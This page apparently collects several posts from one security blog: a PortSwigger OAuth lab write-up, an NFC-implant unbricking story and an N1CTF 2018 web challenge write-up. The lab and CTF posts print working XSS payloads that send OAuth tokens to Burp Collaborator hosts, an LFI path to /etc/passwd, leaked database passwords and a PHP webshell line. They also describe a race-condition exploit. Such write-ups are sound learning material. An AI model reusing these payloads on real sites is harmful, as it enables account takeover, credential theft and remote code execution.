PortSwigger provides some labs that is constantly updated and I like to use it to improve my web hacking skills.

Recently they released a whole new set of labs on OAuth Authentication, I solved each one, learned new things, and ended up with a interesting unintended solution for the "Expert" lab that I want to share back to the community.

This lab is a simple blogging system that allows users to login with their social network.

The admin will open every link you send. So we need to craft a one-click account takeover exploit to access the admin API key.

The intended solution

After analyzing the social media authentication request you will notice a redirect_uri parameter pointing to the oauth callback URL. This is where the system will redirect after confirming the authentication and it will append the current session access_token as URL fragment on client-side browser.

https://ac651fc21edf6692801b01df027000b8.web-security-academy.net/auth?client_id=h5hsc2015lpfl11rdst2n&redirect_uri=https://acba1f7e1eac66838035014900ce0059.web-security-academy.net/oauth-callback&response_type=token&nonce=2022103900&scope=openid%20profile%20email  

In some cases you can directly change the redirect_uri pointing to your own server leaking the access_token.

https://ac651fc21edf6692801b01df027000b8.web-security-academy.net/auth?client_id=h5hsc2015lpfl11rdst2n&redirect_uri=https://YOUR-SERVER-HERE/oauth-callback&response_type=token&nonce=2022103900&scope=openid%20profile%20email  

But not in this case..

There's a whitelist of redirect_uris and the URL must include the substring:

https://acba1f7e1eac66838035014900ce0059.web-security-academy.net/oauth-callback  

Path traversal

The whitelist forces the redirection to be fixed on this host, but not on this path, because this whitelist is vulnerable to a Path Traversal.

https://acba1f7e1eac66838035014900ce0059.web-security-academy.net/oauth-callback/../OTHERPATH

Will be interpreted as:

https://acba1f7e1eac66838035014900ce0059.web-security-academy.net/OTHERPATH  

Knowing this, we can redirect the callback to everywhere on this host, but where we can redirect to leak their access_token?

Insecure web messaging scripts

After a enumeration I found some insecure web messaging scripts that create a Post Message with the data="window.location.href" when the page loads pointing to a parent listener trusting on *.

Parent Post Message trigger trusting on *

Following the Post Message content, triggered on page load.

Post message Event Listener on a comment box.

This is a perfect gadget to us, because window.location.href includes the URL fragment and the post message will propagate to every parent listener.

So, the main idea is:

• Create a malicious web page w/ our own listener redirecting the event data to a external server;
• Include a IFRAME to load the Callback redirecting to a Path Traversal /oauth-callback/../post/comment/comment-form where the post message trigger are stored;
• The post message will be sent to our parent listener and the listener will dump the event data to our external server using a JS location redir.

My final payload

The expected payload to solve this lab.

<script>  
window.addEventListener('message', function(e){  
  var myJSON = JSON.stringify(e.data); 
  location="https://xjk4v64ui2yq425467i1tz766xcn0c.burpcollaborator.net/?x="+encodeURIComponent(myJSON);
    });
</script> 

<iframe id="aaaa" src="https://ac6d1f1f1e9462a380ec24ee02f500e3.web-security-academy.net/auth?client_id=pfx6adz3dqzlgebroh99o&redirect_uri=https://acd01fa21eb0624f806f2427008a0072.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=1679470272&scope=openid%20profile%20email" onload="this.contentWindow.postMessage('intrd'),'*')">  

Hosting this on a malicious web page and sending to user will leak the access_token.

And finally with this Bearer session token we can authenticate as admin, extract their APIKEY.

And submit the solution.

The unintended solution

Well, the original solution depends on this Web Message scripts.

What if there's no Web Message scripts?

So, If you enumerate this OpenID authentication server a little more you will find the OpenID Connect configuration values from the provider's Well-Known Configuration Endpoint, per the specification (http://openid.net/specs/openid-connect-discovery-1_0.html#ProviderConfigurationRequest).

The /.well-known/openid-configuration will leak all OpenID endpoints and accepted parameters.

As we know, the default response_mode is fragment, its not included on the request but you can add the parameter and get the normal redirect callback+fragments response.

Now following this OpenID configuration I noticed that we are also allowed to set form_post,fragment and query modes.

And the form_post mode will return a HTML page with a auto-submit form that includes a hidden access_token input.

You can also change the response_type to id_token token, it will return a full JWT token, useful in some cases.

HTML Injection

The same way this endpoint are vulnerable to Path Traversal, it is also vulnerable to HTML Injection.

I noticed that you can break the "> and reflect everything the callback response page, there's no filtering.

With the following payload you are able to trigger a perfect reflected XSS, and it will be processed before the callback auto-form post.

https://ac781f131e7fc6b480b0008402df0010.web-security-academy.net/auth?client_id=j12euxwsilq7h2ify5qop&redirect_uri=https://ac621fda1e74c65080fa0017006500e8.web-security-academy.net/oauth-callback"><script>alert(0)</script><x="&response_type=token&nonce=-752270522&scope=openid%20profile%20email&response_mode=form_post  

Now we have a XSS executed directly on a page containing the access_token.

We just need to find a way to dump this page content to a external server.

Trying to redirect the document.body.innerHTML to a external server

This is the most simple way to read a page content from a XSS bypassing CORS, and the first thing to came in my mind.

https://acdd1f011f7a275781d61e6c02b8005e.web-security-academy.net/auth?client_id=wt8e823bklnuhof8cekfj&redirect_uri=https://ac7b1fca1f9e271c81e31e7e00c30051.web-security-academy.net/oauth-callback/%22%3e%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%3d%22%68%74%74%70%73%3a%2f%2f%61%76%39%68%37%6a%67%37%75%66%61%33%67%66%68%68%69%6b%75%65%35%63%6a%6a%69%61%6f%31%63%71%2e%62%75%72%70%63%6f%6c%6c%61%62%6f%72%61%74%6f%72%2e%6e%65%74%3f%78%3d%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%29%3c%2f%73%63%72%69%70%74%3e%3c%78%3d%22%26%72%65%73%70%6f%6e%73%65%5f%74%79%70%65%3d%74%6f%6b%65%6e&nonce=381190702&scope=openid%20profile%20email&response_mode=form_post  

The redirection works, the XSS read the document.body.innerHTML URIencode and send to a external server as a parameter.

But because the synchronous nature of Javascript the page content breaks on the exact point that script is executed closing the </form> and ignoring the rest of the page, also ignoring the access_token input value.

Taking advantage of callback auto-submit form to submit a dangling form input as a new comment

This one was cool, the main idea is:

• Use this auto-submit form generated by OpenID callback pointing to a Path traversal /oauth-callback/../post/comment
• This will submit a new comment on the blog comment box
• And I will use a dangling <textarea> to read the rest of the page, including the access_token input and set it as comment input value.

https://acdd1f011f7a275781d61e6c02b8005e.web-security-academy.net/auth?client_id=wt8e823bklnuhof8cekfj&redirect_uri=https://ac7b1fca1f9e271c81e31e7e00c30051.web-security-academy.net/oauth-callback/../post/comment"><input+type%3d"hidden"+name%3d"csrf"+value%3d"krmJUkwDpNZFBqhiFEDpP25A9Ql6uAKg"><input+type%3d"hidden"+name%3d"name"+value%3d"aaaaaa"><input+type%3d"hidden"+name%3d"email"+value%3d"aaaaaa@sads.com"><input+type%3d"hidden"+name%3d"website"+value%3d"http://asdsd"><input+type%3d"hidden"+name%3d"postId"+value%3d"1"><textarea+id%3d"hidden"+name%3d"comment"+rows%3d"4"+cols%3d"50">&response_type=token&nonce=381190702&scope=openid%20profile%20email&response_mode=form_post  

Pay attention on that dangling <textarea> that never closes, this will send the rest of the form as comment parameter.

Crazy idea?

It works like a charm, commented the victim access_token.

But there's a problem here, our payload has a hardcoded CSRF token and the victim session(admin) will have a different CSRF token, so we need to leak this CSRF token first and then do the post.

This sounds possible, but i've found a better way.

Asynchronous fetching the entire callback page

We already are controlling the client-side browsing why not force the client to do another callback redirect and then fetch the full response using JavaScript Fetch API?

"><script>

const url = 'https://acdd1f011f7a275781d61e6c02b8005e.web-security-academy.net/auth?client_id=wt8e823bklnuhof8cekfj&redirect_uri=https://ac7b1fca1f9e271c81e31e7e00c30051.web-security-academy.net/oauth-callback&response_type=token&nonce=381190702&scope=openid%20profile%20email&response_mode=form_post';  
const intrd_collab = 'https://n6uuiwrk5slgrssutx5rgpuwtnzgn5.burpcollaborator.net';

const request = async () => {  
    const response = await fetch(url);
    const dump = await response.text();
    new Image().src=intrd_collab+'/?dump='+encodeURIComponent(dump);
}
request();

</script><input "hidden" name="xxx" value="  

The idea here is:

• Change the OpenID response_mode to form_post, returning a auto-submit callback page;
• Use the XSS to execute a async fetch JS to the response;
• This will do a new GET request to the callback and stores the full response into a variable;
• URIencode this variable as a parameter and create a new Image() that point the src to a external server.

This way you can read the entire callback page content and the new Image() trick will bypass the CORS.

Final Payload (unintended way)

Putting all the things together.

<script>  
location="https://acdd1f011f7a275781d61e6c02b8005e.web-security-academy.net/auth?client_id=wt8e823bklnuhof8cekfj&redirect_uri=https://ac7b1fca1f9e271c81e31e7e00c30051.web-security-academy.net/oauth-callback%22%3e%3c%73%63%72%69%70%74%3e%0d%0a%0d%0a%63%6f%6e%73%74%20%75%72%6c%20%3d%20%27%68%74%74%70%73%3a%2f%2f%61%63%64%64%31%66%30%31%31%66%37%61%32%37%35%37%38%31%64%36%31%65%36%63%30%32%62%38%30%30%35%65%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%61%75%74%68%3f%63%6c%69%65%6e%74%5f%69%64%3d%77%74%38%65%38%32%33%62%6b%6c%6e%75%68%6f%66%38%63%65%6b%66%6a%26%72%65%64%69%72%65%63%74%5f%75%72%69%3d%68%74%74%70%73%3a%2f%2f%61%63%37%62%31%66%63%61%31%66%39%65%32%37%31%63%38%31%65%33%31%65%37%65%30%30%63%33%30%30%35%31%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%6f%61%75%74%68%2d%63%61%6c%6c%62%61%63%6b%26%72%65%73%70%6f%6e%73%65%5f%74%79%70%65%3d%74%6f%6b%65%6e%26%6e%6f%6e%63%65%3d%33%38%31%31%39%30%37%30%32%26%73%63%6f%70%65%3d%6f%70%65%6e%69%64%25%32%30%70%72%6f%66%69%6c%65%25%32%30%65%6d%61%69%6c%26%72%65%73%70%6f%6e%73%65%5f%6d%6f%64%65%3d%66%6f%72%6d%5f%70%6f%73%74%27%3b%0d%0a%63%6f%6e%73%74%20%69%6e%74%72%64%5f%63%6f%6c%6c%61%62%20%3d%20%27%68%74%74%70%73%3a%2f%2f%6e%36%75%75%69%77%72%6b%35%73%6c%67%72%73%73%75%74%78%35%72%67%70%75%77%74%6e%7a%67%6e%35%2e%62%75%72%70%63%6f%6c%6c%61%62%6f%72%61%74%6f%72%2e%6e%65%74%27%3b%0d%0a%0d%0a%63%6f%6e%73%74%20%72%65%71%75%65%73%74%20%3d%20%61%73%79%6e%63%20%28%29%20%3d%3e%20%7b%0d%0a%20%20%20%20%63%6f%6e%73%74%20%72%65%73%70%6f%6e%73%65%20%3d%20%61%77%61%69%74%20%66%65%74%63%68%28%75%72%6c%29%3b%0d%0a%20%20%20%20%63%6f%6e%73%74%20%64%75%6d%70%20%3d%20%61%77%61%69%74%20%72%65%73%70%6f%6e%73%65%2e%74%65%78%74%28%29%3b%0d%0a%20%20%20%20%6e%65%77%20%49%6d%61%67%65%28%29%2e%73%72%63%3d%69%6e%74%72%64%5f%63%6f%6c%6c%61%62%2b%27%2f%3f%64%75%6d%70%3d%27%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%64%75%6d%70%29%3b%0d%0a%7d%0d%0a%72%65%71%75%65%73%74%28%29%3b%0d%0a%0d%0a%3c%2f%73%63%72%69%70%74%3e%3c%69%6e%70%75%74%20%22%68%69%64%64%65%6e%22%20%6e%61%6d%65%3d%22%78%78%78%22%20%76%61%6c%75%65%3d%22&response_type=token&nonce=381190702&scope=openid%20profile%20email&response_mode=form_post";  
</script>  

When the authenticated victim clicks on the malicious link..

The entire callback page including the access_token will be leaked to our controlled server as a encoded parameter.

And we can use the session token to retrieve the API token. :)

Bonus: Another XSS

The blog post endpoint /post?postId=9&uly0j'><script>alert(1)</script>aaaa=1 will also works to trigger the XSS and I believe that it can be used to find another ways to leak the access_token.

References

• Stealing OAuth access tokens via a proxy page (Lab) - https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page
• PostMessage-tracker by Frans Rosén - https://github.com/fransr/postMessage-tracker
• OpenID Connect Discovery 1.0 incorporating errata set 1 - https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderConfigurationRequest
• OAuth 2.0 authentication vulnerabilities - https://portswigger.net/web-security/oauth
• OpenID Connect vulnerabilities - https://portswigger.net/web-security/oauth/openid#openid-connect-vulnerabilities
• The Fetch API - https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API

I haven't updated this blog for a long time. Too busy with the new job. But I got some time to tell you an interesting tale of a n00b on BioHacking Village @ DEF CON 27.

Biohacking is an exciting thing, something that combines minimalism with Open Source technology that allows me to load a few bytes of data into my body that can be wireless readable, it always seemed like a good idea to me. Amal Graafstra, founder and CEO of @DangerousThings was the pioneer, a good overview here: TEDx talk.

Looking for a professional body piercers

So, while watching some talks on DEF CON 27, I found a tweet from @c00p3r_7 (Dangerous Minds) saying there would be some implants available on Biohacking village.

..so I rushed to Biohacking village

Choosing the implant

Did a little research on available chips and choose the xNT NFC Chip:

Picture from chipmylife.io

A 13.56MHz ISO14443A & NFC Type 2 chip (2x12mm cylindrical sterile bioglass implant) w/ 886 bytes of user read/write memory. Perfect size/capacity for the applications that I want.

Passive NFC chips are magnetically coupled devices that power themselves and communicate data over a shared magnetic field the reader generates. It has no battery, when it is out of the magnetic field it is useless like a splinter.

Quality of the bioglass? take a look at x-series stress tests by Dangerousthings.

The implant

So no frills, a nice and very professionally girl made the implant, video:

Implant technical details? Professional Guide to 2x12mm GlassTransponder Installation published by Dangerousthings.

Also, if you are curious about how to remove it, here is a random video (graphic).

Read/Write test

A few hours later when I arrived back to the hotel, so I did the first reading/writing using NFC Tools on a mobile phone.

I noticed that the power of the smartphone reader that's enough but not so strong/stable, so a minimum movement would end up damaging the reading/writing operation.

Soft bricking the NFC implant

I live to break/fix things, already imagined that would brick my implant (but not so fast). And of course, I didn't RTFM and did not used the official DT app (that prepares the user memory pages protecting the config pages to read/write).

So after a few read/writes with NFC Tools Pro, while writing some records (a String text and a BTC pubkey), I've write protected it by setting a password.

..but this time the writing did not end entirely and threw a writing an error, I think I took it too early and confirmed bricked my NFC implant.

Now, no application had writing permission on my implant, even the official one. Also tried to send some low-level authentication instructions, but it returns NAK (denied).

I even thought I could have written the password in half or some symbol truncated the password, because I'd tried to set a strong password, tried just a few bytes, possible mutations, but no success.

No problem, my 1st NFC implant become bricked but not useless, reading still works, a cool text string and my btc pubkey was stored, like a permanent tattoo :)

Second NFC implant

My permanent tattoo was ok, but I liked the thing, So why not do another implant? Then I did it!

Meet @c00p3r_7 (Dangerous Minds) at @toool Lockpick Village.

..and got a new one on my right hand! This time I didn't even touch the implants until I back home.

RTFM & Unbricking the implant

Now with a computer, proper devices and time to read the datasheet documentation and all material from the DangerThings forum, i'm ready to try some things.

After understanding the memory organization, the function of ACCESS, MIRROR page.

..and AUTH0/PROT/PWD configuration parameters, I finally figured out what happened.

Comparing w/ my bricked NFC implant config pages parameters:

As you can see, NFC Tools Pro write every record ok, also set the E2 page read-only locking permissions dependent of a password, and changed the AUTH0 config flag to mark every page below the 00 as read-only (everything including user memory and config page), but the connection broken while setting the password page which remained the standard. Luckily we can still read the config page including the password.

That's why the password I was using didn't work anymore and that combination was not accepted by GUI NFC applications.

So, I authed with the default password 1B FFFFFFFF (it returns 0000 if the default pw is correct not PAK or NAK). Then sent A2 E3040000E2 to change AUTH0 from 00 to E2.

...

And done, I am able to write to it again!

I've changed the default pw and now after sending A2 E480050000 to set config pages password-dependent also for reading the config pages are returned like this:

...
[E1] ?  00 00 00 00 |....|
[E2] ?p XX XX XX XX (LOCK2-LOCK4, CHK)
[E3] ?p XX XX XX XX (CFG, MIRROR, AUTH0)
[E4] ?p XX XX -- -- (ACCESS)
[E5] +P XX XX XX XX (PWD0-PWD3)
[E6] +P XX XX -- -- (PACK0-PACK1)

x-ray picture by @dylanmatt from Vox

Awesome, now I have about 2kb storage wireless readable built-in in my body!

DEF CON as always providing amazing experiences.

Recommended tools

• Dangerous NFC (BETA) - https://play.google.com/store/apps/details?id=com.dangerousthings.nfc&hl=en
• NFC TagInfo by NXP - https://play.google.com/store/apps/details?id=com.nxp.taginfolite&hl=en
• NFC Tools Pro Edition - https://play.google.com/store/apps/details?id=com.wakdev.nfctools.pro&hl=en
• NFC TagWriter by NXP - https://play.google.com/store/apps/details?id=com.nxp.nfc.tagwriter&hl=en
• NFC Mobile Shell - https://forum.dangerousthings.com/uploads/default/original/1X/6b6999b1515b5d7dfa47368938daf2b488c3bcf3.apk

Recommended hardware

• Dangerous KBR1 (ISO14443A) - https://cyborg.ksecsolutions.com/kit/dt-kbr1/
• Chameleon Mini RevE Rebooted, ISO14443A Codec Mifare Ultralight emulation (emulation and reader) - https://hackerwarehouse.com/product/chameleon-mini-reve-rebooted/
• ACR122U 13,56 mhz ISO14443 A/B (NTAG213, NTAG215 e NTAG216) reader/writer - https://www.acs.com.hk/en/download-manual/419/API-ACR122U-2.04.pdf

References

• Biohacking, the forefront of a new kind of human evolution by Amal Graafstra at TEDxSFU - https://www.youtube.com/watch?v=7DxVWhFLI6E
• Tests we’ve performed on our x-series tags - https://forum.dangerousthings.com/t/tests-weve-performed-on-our-x-series-tags/474
• Dangerous Minds Podcast - https://www.dangerousminds.io/
• Help! Can’t write to xNT - https://forum.dangerousthings.com/t/help-cant-write-to-xnt/3131/2
• xNT stuck in read only mode - https://forum.dangerousthings.com/t/xnt-stuck-in-read-only-mode/2782
• TOOOL - https://twitter.com/toool
• Removal of RFID implant (graphic) - https://www.youtube.com/watch?v=_Qpj2ZztycE
• Professional Guide to 2x12mm GlassTransponder Installation - https://dangerousthings.com/wp-content/uploads/Professional-Guide-to-2x12mm-transponder-installation.pdf
• Biohacking Village @ DEF CON - https://twitter.com/dc_bhv
• DangerousThings - https://twitter.com/DangerousThings
• Chip My Life - https://chipmylife.io
• NTAG213/215/216NFC Forum Type 2 Tag compliant IC with 144/504/888 bytes user memory - https://dangerousthings.com/wp-content/uploads/NTAG213_215_216.pdf
• I got a computer chip implanted into my hand - https://www.vox.com/2015/9/11/9307991/biohacking-grinders-rfid-implant

This weekend I and @shrimpgo decided to try some CTF, noticed that N1CTF2018 are running. Quickly joined and there's a lot of challenges, but this unsolved easy php called our attention.

I doubt it was easy, several hours of CTF had already passed and it remained unsolved.

Challenge details

Not racing, just enjoying the slow pace of life :)  
http://47.97.221.96, Mirror: http://47.97.221.96:23333/  

Dockerfile

FROM andreisamuilik/php5.5.9-apache2.4-mysql5.5

ADD nu1lctf.tar.gz /app/  
RUN apt-get update  
RUN a2enmod rewrite  
COPY sql.sql /tmp/sql.sql  
COPY run.sh /run.sh  
RUN mkdir /home/nu1lctf  
COPY clean_danger.sh /home/nu1lctf/clean_danger.sh

RUN chmod +x /run.sh  
RUN chmod 777 /tmp/sql.sql  
RUN chmod 555 /home/nu1lctf/clean_danger.sh

EXPOSE 80  
CMD ["/run.sh"]

Enumeration

Starting the enumeration of provided web service.

There's a login page, If you try to log in with any credential you will receive the code error message. And apparently the username/password check is not even executed.

Ok, they are leaking this sentence Code(substr(md5(?), 0, 5) === b5152), looks like part of code checking function.. checking only the first 5 bytes of md5("code"). And this 5 bytes changes on every refresh.

You need to solve a Proof-Of-Work, send the result with the login request. I believe they did this to minimize brute-force abuse. Very common in CTF challenges.

So, I leave this aside and continued my enumeration...

Source code leaking

By brute-forcing common filenames and directories we was able to leak the entire source code of the web application:

# Web application files & scripts
http://47.97.221.96:23333/index.php  
http://47.97.221.96:23333/config.php  
http://47.97.221.96:23333/user.php  
http://47.97.221.96:23333/static

# Backup files leaking the source code
http://47.97.221.96:23333/index.php~  
http://47.97.221.96:23333/config.php~  
http://47.97.221.96:23333/user.php~

# PHP scripts without .php extension leaking the views source code
http://47.97.221.96:23333/views  
http://47.97.221.96:23333/views/delete  
http://47.97.221.96:23333/views/index  
http://47.97.221.96:23333/views/login  
http://47.97.221.96:23333/views/profile  
http://47.97.221.96:23333/views/publish  
http://47.97.221.96:23333/views/register

# "Useless" phpinfo() running over command line: <?php system("php -r \"phpinfo();\"") ?>
http://47.97.221.96:23333/views/phpinfo  

From the config.php source code we are able to extract the mysql user password.

• MySQL user password: Nu1L / Nu1Lpassword233334.

Local File Inclusion (LFI)

Analyzing the leaked source code we found that http://47.97.221.96:23333/index.php?action=login are vulnerable to LFI.

Now we can read any file on the system that our user have permission w/ this payload: http://47.97.221.96:23333/index.php?action=../../etc/passwd

The provided Dockerfile are showing us some interesting info and file paths that we can read using the LFI.

Starting by the FROM andreisamuilik/php5.5.9-apache2.4-mysql5.5 docker container confirming the version of php, apache and mysql.

/run.sh script

#!/bin/bash
chown www-data:www-data /app -R

if [ "$ALLOW_OVERRIDE" = "**False**" ]; then  
    unset ALLOW_OVERRIDE
else  
    sed -i "s/AllowOverride None/AllowOverride All/g" /etc/apache2/apache2.conf
    a2enmod rewrite
fi

# initialize database
mysqld_safe --skip-grant-tables&  
sleep 5  
## change root password
mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('Nu1Lctf%#~:p') WHERE user='root';FLUSH PRIVILEGES;"  
## restart mysql
service mysql restart  
## execute sql file
mysql -uroot -pNu1Lctf\%\#~\:p < /tmp/sql.sql

## crontab
(while true;do rm -rf /tmp/*;sleep 2;done)&

## rm sql
cd /tmp/  
rm sql.sql  
rm /var/www/phpinfo  
source /etc/apache2/envvars  
tail -F /var/log/apache2/* &  
exec apache2 -D FOREGROUND  

Found MySQL user password and some system info.

• MySQL root password: root / Nu1Lctf%#~:p

We also tried to fuzz common paths, /proc's, file descriptors etc.. to get more information about the system.

Not much found, just confirmed the user are running apache2, cmdline, some log paths that we do not have permission to access and Linux header Linux df551128a261 3.13.0-30-generic #54-Ubuntu SMP Mon Jun 9 22:45:01 UTC 2014 x86_64.

The PHP Filters & wrappers are also enabled.

Registered PHP Streams => https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip  
Registered Stream Socket Transports => tcp, udp, unix, udg, ssl, sslv3, tls  
Registered Stream Filters => zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, mcrypt.*, mdecrypt.*  

But we cannot find a way to use it because the require_once 'views/'.$_GET['action']; this views/ prefix we need to escape with ../ in order to get a LFI and it not works with the php://. (if u know a way, plz tell me)

MD5 collision PoW

With all enumerated information about the system and even without a RCE we decided to solve the md5 collision to start attacking the login system.

So, the user.php~ are leaking all the login process details.

Breaking the code into pieces, this if(substr(md5($_POST['code']),0, 5)!==$_SESSION['code']) is mandatory to solve in order to poke the register/login credentials checking functions.

This code is stored in session cookie we leak the content but cannot control it (yet).

If the system return the Invalid user name means that we have sent the correct code.

MD5 first 5 bytes hash collision generator

We quickly wrote this code to get a valid collision.

<?php  
## MD5 first 5 bytes hash collision generator - solution to easy_php @ N1CTF2018  
# solved by intrd & shrimpgo - p4f team

## 1st create a wordlist: crunch 4 4 1234567890abcdefghijklmnopqrstuvwxyz_ -o file.txt

$_SESSION['code']=$argv["1"];
echo "** searching for: ".$_SESSION['code']."\n";

if ($file = fopen("file.txt", "r")) {  
    while(!feof($file)) {
        $line = trim(fgets($file));
        $_POST['code'] = $line;
        if(substr(md5($_POST['code']),0, 5)===$_SESSION['code']){
            echo "yeah!\n".md5($line);
            echo ":\n".$line."\n";
            die();
        }
    }
    fclose($file);
}
?>

Gaining System Access

Now using the pre-generated code aklhic we are able to create a new user browsing to http://47.97.221.96:23333/index.php?action=register

Nice, logged in.

Browsing the web application features, we can publish some content.. and set the Allow different ip to login flag to current user. Nothing more..

..nothing more unless you have the is_admin=1 flag set on your cookie.

As you can see, this flag enables the file sending option, a good way to get our RCE.

How to set the is_admin=1?

Code set this flag to 1 if the login/register POST are from the correct IP, I bet it was 127.0.0.1.

The get_ip() function is strictly reading the REMOTE_ADDR, I think i cannot spoof this value.

Trying session cookie code injection

First idea is inject some <?php code ?> on cookie session file that I can launch from LFI.

Now we have more information stored on the cookie file, but only username I can control. And this is properly filtered.

This check is blocking invalid usernames. We cannot create a new user with some code on it.

Trying SQL injection

So, our next idea is checking for some SQL injection.

The queries are very simple and the Db() controller are not properly filtering this. But the code are.

Sometimes it is converting the type to (int) before sending to query. It breaks our SQLi attempts.

In other cases like insert() it is filtering using the preg_match().

I think it is possible to bypass the (int) sending an array[] or something like this, and I'm sure this is vulnerable to SQLi by other ways, but no success on my tries. (if you know how to do this plz tell me)

Object Injection? POP Chain?

We know the unserialize + PHP are ALWAYS VULNERABLE.

This unserialize() of the mood object is very suspicious. Mood class does not have any php magic function that we can abuse, but the Db{} has.

Ok, but how trigger this?

I created this serialized object locally to a deep inspection.

<?php  
class Mood{

    public $mood, $ip, $date;

    public function __construct($mood, $ip) {
        $this->mood = $mood;
        $this->ip  = $ip;
        $this->date = time();
    }

    public function getcountry()
    {
        $ip = @file_get_contents("http://ip.taobao.com/service/getIpInfo.php?ip=".$this->ip);
        $ip = json_decode($ip,true);
        return $ip['data']['country'];
    }

    public function getsubtime()
    {
        $now_date = time();
        $sub_date = (int)$now_date - (int)$this->date;
        $days = (int)($sub_date/86400);
        $hours = (int)($sub_date%86400/3600);
        $minutes = (int)($sub_date%86400%3600/60);
        $res = ($days>0)?"$days days $hours hours $minutes minutes ago":(($hours>0)?"$hours hours $minutes minutes ago":"$minutes minutes ago");
        return $res;
    }

}

$_POST['mood'] = 1;
$mood = addslashes(serialize(new Mood((int)$_POST['mood'],"127.0.0.1")));
#$mood = serialize(new Mood((int)$_POST['mood'],"127.0.0.1"));
echo $mood;  
// $mood = unserialize($mood);

// $country = $mood->getcountry();
// print $country;
?>

..and confirmed that I only can control the mood id, that one converted to integer before to get inside the serialized object. Again, no injection because the conversion.

XSS? SSRF?

Maybe there a PhantomJS or some script browsing to my publications?

If we are able to trigger a SSRF, I was able to craft a POST and set my user as is_admin=1!

Nope, we have the Dockerfile showing every system changes, and leaked a lot of things that indicate this is not happening. Also there's a htmlentities() and other things filtering our XSS tries, and javascript: didn't work outside a <tag>.

Emulating locally the remote environment

After a lot of frustrated tries, we decided to move back to enumeration searching another attack vector.

So, Dockerfile shows us that they used a public repository to create the base system for this challenge.

I pulled this to my machine, sync'd everything, got a rootshell on it and started the Container enumeration.

The only things that I cannot sync was of course the ADD nu1lctf.tar.gz /app/ and
COPY sql.sql /tmp/sql.sql containing the challenge data.

Unintend way to RCE/Flag

Checking the environment we noticed that the challenger made a mistake(intentionally probably) while removing the /var/www/phpinfo folder on /run.sh script.

He missed the -r and it will leave the folder on environment w/ all its contents!

Nice! Different from that useless /app/views/phpinfo that are running over command-line, now we have this phpinfo(); that we can reach directly from web server and interprets our GET and POST requests!

And, why this phpinfo() is dangerous?

Remember the challenge description:

Not racing, just enjoying the slow pace of life :)  

I do not like the slow pace of life and decided to try a well known race condition exploit on it.

• PHP LFI to arbitratry code execution via rfc1867 file upload temporary files

Gynvael Coldwind wrote this awesome paper about a Race Condition that can be exploited abusing the PHP File Upload function. Btw our php5.5.9 is vulnerable to this issue.

In order to exploit this we need to launch a multi-thread script to flood the PHP Job queue w/ junk and we have a little time window to access this temporary created files before it was automatically deleted.

The random_value is later written as 6 digits of k=62 (A-Za-z0-9 charset) numeric system, and appended to the "/tmp/php" prefix (unless another directory is set),
e.g. /tmp/phpUs7MxA. -- Gynvael

Also found this another paper from brett.moore@insomniasec.com:

• LFI with PHPInfo assitance (includes PoC)

I tried to use the Insomniasec PoC described on paper but no success, maybe because some chinese server conditions and settings, I don't know what happened.

Instead of troubleshooting that PoC and to learn a new thing, following the Gynvael and Insomniasec papers we decided to write a new exploit from scratch troubleshooting every step on my local docker environment.

Final exploit

The idea behind this code is generate a lot of junk on headers, cookies, uri and POST all the shit including your payload.txt to the phpinfo endpoint.

If the File Upload work, the phpinfo() will respond with the temporary file path.

You aren't fast enough to access this file before it was processed/deleted by PHP. But the multi-thread script are!

This is the payload that will be executed if some thread are fast enought to hit.

<?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>  

It will create /app/intrd, a webshell that we have access though LFI!

I choose this path because I'm sure this is writable:

But remember..
We are not at an advantage in this race.

There are a fucking rm -rf /tmp/*; running every 2 seconds on the system.

We have the worst scenario possible:

• This job deleting everything on /tmp every 2s;
• PHP deleting temporary files after processing.
• Chinese server - Other side of the world for me (Brazil);
• Lot of players bruteforcing the application turning the response insanely slow.

Anyway, why not give a try?

So, I launched my exploit locally.

While the Race Condition exploit are running w/ 50 threads, I keep checking the existence of my webshell at /app/intrd.

And, after a few minutes, it worked like a charm! We got our RCE at the controlled environment.

China number one

So, when I tried the exploit remote I have not had the same luck :(.

Of course the Chinese server are too far from me, and the brazilian ISP sucks a lot, tracert indicates that there's a single Embratel node sucking more than 200ms, ending w/ the total ping response 650ms+.

But it become personal, we would not give up at this point.

So we decided to shorten the distance and travel (virtually) near to China!

Thanks DigitalOcean!

350ms now i'm ok to launch my exploit from a VPS hosted on Bagalore!

And after about 1 hour trying, finally got my webshell written to the /app folder.

I think the players loading the server's CPU with bruteforce shit helped me a lot slow-ling the php queue this time.

I quickly upgrade this RCE to a reverse shell.

Where's the flag?

So, knowing the docker environment, and excluding the nu1lctf.tar.gz content, that at this point we had already been digging into everything. My bet was the MySQL database.

Remember the mysql root password leaked on the beginning? I used this to dump all the databases to a file and greped for the flag prefix.

mysqldump -uroot -pNu1Lctf\%\#~\:p --all-databases > /app/intdbs.sql  

A HUGE win!
Also, the flag text confirmed the intended way was that first path we were following.

PHP unserialize + SSRF + CRLF Injection, Jesus, we have no time to learn this today. Hey, Easy? :p

Learned a lot in a single chall.

Awesome CTF Nu1L .Cyberpeace, unfortunately we did not have time to try the other challenges but I'm sure they were as well developed as this one!

And thanks @shrimpgo, awesome team up and brainstorms!

UPDATE: Expected solution (PHP unserialize + SSRF + CRLF Injection)

• ezphp - official writeup by wupcode (admin)

Resources

• NICTF 2018
• Docker cheat sheet
• OWASP, testing for LFI
• PHP Protocols and Wrappers
• Collision attack
• MD5 Collision demo
• A simple unit test to show a MD5 hashing collision
• OWASP, PHP Object injection
• Race condition
• insomniasec, Pratical PHP Object Injection
